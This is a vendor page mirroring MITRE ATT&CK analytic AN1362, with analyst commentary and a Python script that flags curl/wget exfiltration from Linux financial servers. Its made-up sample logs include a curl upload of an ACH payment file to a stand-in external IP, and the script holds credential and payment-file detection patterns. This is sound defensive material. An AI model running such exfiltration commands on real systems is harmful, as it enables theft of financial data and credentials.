MITRE ATT&CK® Analytic

AN1362: Analytic 1362

Monitor server and endpoint logs for unusual outbound network connections to cryptocurrency nodes, unauthorized scripts accessing financial systems, or automation targeting payment file formats. Detect curl/wget activity aimed at exfiltrating transaction data or credentials from financial apps.

Enterprise | AN1362 | Analytic | Object v1.0 | Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

AN1362 is a Linux-focused detection analytic for spotting suspicious outbound connections and automation that may indicate financial transaction data, credentials, or payment-related files are being targeted. Its value is not just technical: if an organization runs financial applications or payment workflows on Linux systems, this analytic points leaders toward validating whether SOC monitoring can see unusual external connectivity, script activity, and data movement from those systems.

Executive priority

Prioritize this where Linux servers support finance, treasury, billing, payment processing, or other high-value transaction workflows. The business question is whether the organization can produce timely evidence of suspicious outbound activity from those systems and distinguish approved automation from unauthorized scripts. This supports incident decision-making, audit readiness, and resilience of financial operations, but local asset criticality and log coverage are required to determine actual priority.

Technical view

SOC and detection teams should validate monitoring of server and endpoint logs on Linux systems for unusual outbound network connections to cryptocurrency nodes, unauthorized scripts accessing financial systems, automation targeting payment file formats, and curl/wget activity associated with exfiltration of transaction data or credentials from financial applications. Because no ATT&CK tactic, relationship context, or formal detection logic is supplied, teams should translate the description into environment-specific analytics using known financial application hosts, approved scripts, expected destinations, and normal transfer patterns.

Likely telemetry

  • Linux server and endpoint logs
  • Outbound network connection logs from Linux hosts
  • Process execution telemetry for curl and wget
  • Script execution or automation logs
  • Financial application access logs

Detection direction

  • Baseline expected outbound destinations and protocols for Linux systems that host or access financial applications.
  • Alert on unusual outbound connections from financial systems, especially to destinations inconsistent with business workflows, including cryptocurrency-node-related infrastructure where identifiable.
  • Monitor curl and wget execution from financial application servers, tuning for legitimate administrative or integration activity.
  • Correlate script execution with access to transaction data, payment file formats, or financial application credentials.
  • Reduce false positives by documenting approved payment automation, scheduled jobs, service accounts, and sanctioned file-transfer processes.
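The detection direction above can be expressed as a small rule set run over host telemetry. The following is an added illustration, not code from Glexia or MITRE: it parses constructed key=value process and connection events from a Linux host, applies a constructed baseline of financial hosts, approved egress destinations and sanctioned automation (all assumptions that would come from your own asset inventory), and emits tagged alerts for unexpected egress, curl/wget use on a financial host, payment-file or credential paths in command lines, and unapproved scripts touching payment files. Port numbers and file-format patterns are heuristics to tune locally.

```python
import os
import re

# --- Constructed baseline (assumptions; replace with your own inventory) ---
FINANCIAL_HOSTS = {"fin-app-01", "treasury-db-01"}
APPROVED_EGRESS = {  # host -> "destination:port" pairs expected for business workflows
    "fin-app-01": {"payments-gw.example.internal:22", "bank-api.example.internal:443"},
}
APPROVED_AUTOMATION = {  # (host, user, script or command substring) for sanctioned jobs
    ("fin-app-01", "svc-pay", "/opt/payroll/export.sh"),
}
CRYPTO_NODE_PORTS = {8333, 30303}  # Bitcoin / Ethereum default P2P ports; tune locally
TRANSFER_TOOLS = {"curl", "wget"}
INTERPRETERS = {"bash", "sh", "python3", "perl"}
# Common payment file formats: ACH/NACHA, SWIFT MT9xx/MT1xx, ISO 20022 pain.00x / camt.05x
PAYMENT_FILE_RE = re.compile(r"\.(?:ach|nacha|mt9\d\d|mt1\d\d)\b|pain\.00\d|camt\.05\d", re.I)
CRED_RE = re.compile(r"\.env\b|credential|passwd|\.pgpass|secret", re.I)

# Constructed sample telemetry in a simple key=value form (not real logs)
SAMPLE_LOGS = """\
ts=2024-05-01T09:00:01Z host=fin-app-01 type=proc user=svc-pay exe=/bin/bash cmd="/opt/payroll/export.sh"
ts=2024-05-01T09:00:02Z host=fin-app-01 type=net user=svc-pay exe=/usr/bin/sftp dst=payments-gw.example.internal:22
ts=2024-05-01T09:05:10Z host=fin-app-01 type=net user=www-data exe=/usr/bin/curl dst=203.0.113.7:8333
ts=2024-05-01T09:05:11Z host=fin-app-01 type=proc user=www-data exe=/usr/bin/curl cmd="curl -s -T /var/fin/out/batch_0501.ach http://203.0.113.7/up"
ts=2024-05-01T09:06:00Z host=fin-app-01 type=proc user=www-data exe=/usr/bin/python3 cmd="python3 /tmp/.x.py /var/fin/out/payroll.pain.001.xml"
ts=2024-05-01T09:10:00Z host=web-01 type=net user=www-data exe=/usr/bin/wget dst=mirror.example.org:443
ts=2024-05-01T09:12:00Z host=fin-app-01 type=proc user=admin exe=/usr/bin/curl cmd="curl -sS https://mirror.example.internal/patch.tgz -o /tmp/patch.tgz"
"""

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line):
    """Parse one key=value log line (quoted values allowed) into a dict."""
    return {k: (q or u) for k, q, u in KV_RE.findall(line)}


def is_approved_automation(host, user, cmd):
    """True when the (host, user, command) matches a sanctioned job in the baseline."""
    return any(h == host and u == user and s in cmd for h, u, s in APPROVED_AUTOMATION)


def evaluate(events):
    """Apply the detection direction to parsed events; return a list of alert dicts."""
    alerts = []
    for e in events:
        host, user = e.get("host"), e.get("user")
        if host not in FINANCIAL_HOSTS:
            continue  # other hosts need their own baseline; out of scope here
        tags = []
        if e.get("type") == "net":
            dst = e.get("dst", "")
            if dst not in APPROVED_EGRESS.get(host, set()):
                tags.append("unexpected_egress")
                port = dst.rsplit(":", 1)[-1]
                if port.isdigit() and int(port) in CRYPTO_NODE_PORTS:
                    tags.append("crypto_node_port")
        elif e.get("type") == "proc":
            exe = os.path.basename(e.get("exe", ""))
            cmd = e.get("cmd", "")
            if is_approved_automation(host, user, cmd):
                continue  # documented automation: suppress to reduce false positives
            if exe in TRANSFER_TOOLS:
                tags.append("transfer_tool_on_financial_host")
                if PAYMENT_FILE_RE.search(cmd):
                    tags.append("payment_file_in_cmdline")
                if CRED_RE.search(cmd):
                    tags.append("credential_path_in_cmdline")
            elif exe in INTERPRETERS and PAYMENT_FILE_RE.search(cmd):
                tags.append("unapproved_payment_automation")
        if tags:
            alerts.append({"ts": e.get("ts"), "host": host, "user": user,
                           "tags": tags, "evidence": e.get("dst") or e.get("cmd")})
    return alerts


def run_sample():
    """Run the rules over the constructed sample; returns the alert list."""
    return evaluate(parse_line(l) for l in SAMPLE_LOGS.splitlines() if l.strip())


if __name__ == "__main__":
    for a in run_sample():
        print(a["ts"], a["host"], a["user"], ",".join(a["tags"]), "|", a["evidence"])
```

On the sample, the sanctioned payroll export and its SFTP session produce nothing, while the connection to port 8333, the curl upload of an ACH file, the unapproved script reading a pain.001 file, and an admin's curl download each raise an alert; the last of these is the kind of legitimate administrative activity the tuning step in the direction above is meant to document or suppress.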

Mitigation priorities

  • Inventory Linux systems that support financial applications and payment file workflows.
  • Restrict and review outbound network access from financial application servers based on business need.
  • Define approved automation, scripts, service accounts, and file-transfer paths for financial operations.
  • Ensure logging is enabled for process execution, outbound connections, financial application access, and payment file handling.
  • Use change control and periodic review to detect unauthorized scripts or unexpected automation affecting financial systems.

Analyst notes and limits

The supplied object is a detection analytic, not a full ATT&CK technique. It is specific to Linux and focuses on monitoring server and endpoint logs for suspicious outbound connections, script activity, payment-file automation, and curl/wget use around financial applications. No relationship context is supplied, so mapping to specific tactics, techniques, or procedures should be performed locally.

Official detection logic is not provided, tactics are not specified, and no relationships are supplied. This take cannot assert active exploitation, attribution, impact, or existing detection coverage. Effectiveness depends on the organization’s Linux telemetry, financial application architecture, egress visibility, and knowledge of approved automation.

Official MITRE ATT&CK definition

Analytic 1362

Monitor server and endpoint logs for unusual outbound network connections to cryptocurrency nodes, unauthorized scripts accessing financial systems, or automation targeting payment file formats. Detect curl/wget activity aimed at exfiltrating transaction data or credentials from financial apps.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 01a01cdb5b4553ca...

Imported snapshots across ATT&CK releases (1)

Release   Bundle imported   Object version   Modified   Status           Raw hash
19.1                        1.0                         Current bundle   01a01cdb5b45…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack AN1362

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.